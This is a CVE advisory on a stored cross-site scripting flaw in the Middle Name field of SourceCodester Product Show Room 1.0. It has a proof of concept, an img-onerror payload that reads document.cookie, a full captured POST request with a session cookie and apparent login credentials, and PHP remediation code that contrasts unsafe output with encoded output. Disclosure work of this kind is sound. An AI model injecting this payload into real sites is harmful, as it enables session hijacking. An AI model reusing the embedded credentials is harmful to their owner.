CVE-2024-33302.md
Stored Cross-Site Scripting Vulnerability in SourceCodester Product Show Room 1.0

Vendor: Sourcecodester
Product: Product Show Room 1.0
Product URL: Product Show Room 1.0

Executive Summary

A stored Cross-Site Scripting (XSS) vulnerability in Product Show Room 1.0 and earlier allows an attacker to inject JavaScript through the "Middle Name" input field of the user save form. The payload is written to the database with the user record and executes every time the page that renders that record is viewed, by any user, staff member or administrator, and it persists until the record is changed. Because the script runs in the victim's browser session, it can read the session cookie and so lead to account takeover (cookie theft succeeds only when the session cookie is not flagged HttpOnly; with HttpOnly set, document.cookie does not expose it, although the script can still act on the victim's behalf).

Issue Details

Vulnerability Name: Stored XSS in Middle Name
Severity: High
Affected URL: /psrs/classes/Users.php?f=save
Affected Parameter: middlename (Middle Name)
HTTP Method: POST

Issue Description

The web application is vulnerable to stored Cross-Site Scripting (XSS) in the "Middle Name" input field. An attacker supplies JavaScript in the multipart POST request that creates a user; the value is saved without validation and later written into the HTML without output encoding. In the request below, the attacker sets the "middlename" part to a payload that closes the surrounding attribute with a leading double quote and injects an <img> tag whose onerror handler reads document.cookie. The captured request is sent from an authenticated session (see the Cookie header and the Referer pointing at the admin user management page), so the precondition is access to the user creation form; once stored, the payload fires for every user who views the record. The same payload also appears in the firstname and lastname parts of the captured request; the finding is reported against middlename.

Proof Of Concept

1. Configure a web proxy in your browser.

2. Log in and open the user management page at http://localhost/psrs/admin/?page=user/manage_user (the Referer in the captured request). The form that creates a user submits a POST to http://localhost/psrs/classes/Users.php?f=save.

3. Fill in the input fields, intercept the request in the web proxy, modify the middlename part as shown below and forward the request to the server.

-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="middlename"

"><img src=x onerror=alert(document.cookie)>

4. Create the account in the browser and navigate to the homepage: the stored payload executes and the alert displays the session cookie.

PoC evidence: https://drive.google.com/file/d/1CHgwoOWEVzS_upDJSTGQBMdSoVwqKAKQ/view?usp=drive_link

Payload:

Content-Disposition: form-data; name="middlename"

"><img src=x onerror=alert(document.cookie)>

Request:

POST /psrs/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------20625722601167454874980765703
Content-Length: 1176
Origin: http://localhost
Connection: close
Referer: http://localhost/psrs/admin/?page=user/manage_user
Cookie: PHPSESSID=ne013b16edsf0e0up00dsppfhb
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="id"


-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="firstname"

"><img src=x onerror=alert(document.cookie)>
-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="middlename"

"><img src=x onerror=alert(document.cookie)>
-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="lastname"

"><img src=x onerror=alert(document.cookie)>
-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="username"

mohit.ahir7086@gmail.com
-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="password"

Ramasra1247@
-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="type"

1
-----------------------------20625722601167454874980765703
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream

-----------------------------20625722601167454874980765703--

Impact:

Stored XSS can have serious consequences: account takeover by stealing session cookies, theft of sensitive data, modification of the page content, or redirection of users to malicious sites. Because the payload is stored server-side, it fires for every user, staff member or administrator who views the record, not only for a victim who follows a crafted link.

Remediation:
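The following PHP is an added example written for this report, not code from Product Show Room 1.0. It contrasts the unsafe pattern that produces this finding (the stored middlename echoed straight into an HTML attribute) with the output encoding, server-side validation and session cookie hardening recommended in this section. The user record, the function names (render_unsafe, render_safe, h, valid_name) and the markup are assumptions; the middlename value is the payload from the Proof Of Concept.

```php
<?php
// Added example for CVE-2024-33302; not code from Product Show Room 1.0.
// $row is a constructed stand-in for the user record that Users.php?f=save
// stored after the PoC request. Function names are illustrative.

declare(strict_types=1);

// Constructed sample record: middlename carries the PoC payload verbatim.
$row = [
    'firstname'  => 'Alice',
    'middlename' => '"><img src=x onerror=alert(document.cookie)>',
    'lastname'   => 'Doe',
];

// Vulnerable pattern: raw interpolation into an HTML attribute. The leading
// quote in the payload closes value="..." and the rest becomes a new <img>
// tag whose onerror handler runs in every viewer's session.
function render_unsafe(array $row): string
{
    return '<input type="text" name="middlename" value="' . $row['middlename'] . '">';
}

// Hardened pattern: contextual output encoding. ENT_QUOTES encodes both " and '
// so the value cannot break out of the attribute; ENT_SUBSTITUTE prevents
// invalid UTF-8 from silently turning the whole string into "".
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_safe(array $row): string
{
    return '<input type="text" name="middlename" value="' . h($row['middlename']) . '">';
}

// Server-side validation at the save endpoint: allowlist the characters a name
// may contain and bound its length. This is defence in depth; a blocklist of
// tags is easy to bypass, and encoding on output is what actually stops XSS.
function valid_name(string $value): bool
{
    return $value === '' || preg_match('/^[\p{L}\p{M}\' .-]{1,50}$/u', $value) === 1;
}

// Session hardening: with HttpOnly set, document.cookie no longer exposes
// PHPSESSID, so the cookie-theft step of this report fails even if an XSS
// slips through. Must run before session_start() and before any output.
session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Lax',
    'secure'   => true,
]);

echo render_unsafe($row), PHP_EOL;
// <input type="text" name="middlename" value=""><img src=x onerror=alert(document.cookie)>">
echo render_safe($row), PHP_EOL;
// <input type="text" name="middlename" value="&quot;&gt;&lt;img src=x onerror=alert(document.cookie)&gt;">
echo valid_name($row['middlename']) ? 'middlename accepted' : 'middlename rejected', PHP_EOL;
// middlename rejected
```

The encoding in h() is specific to HTML element content and double-quoted attributes; a value written into a JavaScript string, a URL or a CSS context needs the encoder for that context instead, which is why the rule is to encode at the point of output, not once on input.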

Implement proper input validation and output encoding. On the server, validate that each name field matches the expected shape of a name (an allowlist of permitted characters and a length limit) before it is stored; a blocklist of tags or keywords is easy to bypass and is not sufficient on its own. On output, encode every user-controlled value for the context it is written into, so that quotes and angle brackets cannot terminate an attribute or open a new tag (in PHP, htmlspecialchars with ENT_QUOTES for HTML element content and attributes). As defence in depth, set the HttpOnly flag on the session cookie so that injected script cannot read PHPSESSID, and consider a Content Security Policy that disallows inline event handlers; these limit the impact but do not replace output encoding.

References:

https://portswigger.net/web-security/cross-site-scripting/stored

https://owasp.org/www-community/attacks/xss/

Weakness Enumeration:

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

This report highlights the Stored XSS vulnerability present in the Middle Name parameter of /psrs/classes/Users.php?f=save, including the Proof of Concept, its impact, remediation steps and references for further guidance on mitigation strategies.